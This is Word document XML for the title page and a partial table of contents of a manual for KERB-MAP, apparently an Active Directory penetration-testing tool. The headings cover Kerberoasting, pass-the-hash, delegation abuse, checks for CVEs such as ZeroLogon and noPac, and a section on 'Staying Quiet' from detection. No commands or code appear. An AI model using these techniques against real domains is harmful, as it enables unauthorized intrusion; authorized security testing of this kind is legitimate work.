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60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8B1A1A"/>
          <w:sz w:val="80"/>
          <w:szCs w:val="80"/>
        </w:rPr>
        <w:t xml:space="preserve">KERB-MAP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Kerberos Attack Surface Mapper</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">User Manual &amp; Technical Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Version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200"/>
              <w:left w:type="dxa" w:w="400"/>
              <w:bottom w:type="dxa" w:w="200"/>
              <w:right w:type="dxa" w:w="400"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">AD Enumeration  ·  Kerberoast Scoring  ·  Delegation Mapping</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE Detection  ·  Priority Ranking  ·  BloodHound Export  ·  Encryption Audit  ·  Trust Mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8B1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">For use in authorized penetration testing and red team engagements only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore/>
        <w:spacing w:after="300" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 1 — Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 What kerb-map Does</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 Philosophy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 Prerequisites</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 2 — Quick Start</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 Basic Scan — Password Authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 Pass-the-Hash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 Kerberos Ticket (ccache)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4 Full Scan With CVEs and JSON Export</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 3 — Authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Plaintext Password (-p)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Pass-the-Hash (-H)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Kerberos ccache (-k)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 4 — Module Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 SPN Scanner (--spn)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 AS-REP Scanner (--asrep)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 Delegation Mapper (--delegation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3.1 Unconstrained Delegation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3.2 Constrained Delegation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3.3 Resource-Based Constrained Delegation (RBCD)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4 User Enumerator (--users)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5 Encryption Auditor (--encryption)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.6 Trust Mapper (--trusts)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 5 — CVE Detection Modules (--cves)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 noPac (CVE-2021-42278 / CVE-2021-42287)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 AD CS ESC1–ESC8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 ZeroLogon (CVE-2020-1472) [Aggressive]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5.4 PrintNightmare [Aggressive]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5.5 PetitPotam [Aggressive]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5.6 MS14-068 (CVE-2014-6324)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5.7 GPP Passwords (MS14-025)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5.8 Bronze Bit (CVE-2020-17049)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5.9 Certifried (CVE-2022-26923)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5.10 LDAP Signing Not Required</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 6 — Scoring &amp; Priority Engine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 How Findings Are Ranked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 Next Step Generation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 7 — Output &amp; Export</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 Terminal Output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">7.2 JSON Export (-o json)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">7.3 BloodHound Export (-o bloodhound)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">7.4 Scan History Database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 8 — Complete Flag Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">8.1 Target &amp; Authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">8.2 Module Selection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">8.3 Output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">8.4 Tuning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">8.5 Scan History</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 9 — Detection Profile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">9.1 Noise Level by Module</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">9.2 Staying Quiet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">9.3 The RC4 Problem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
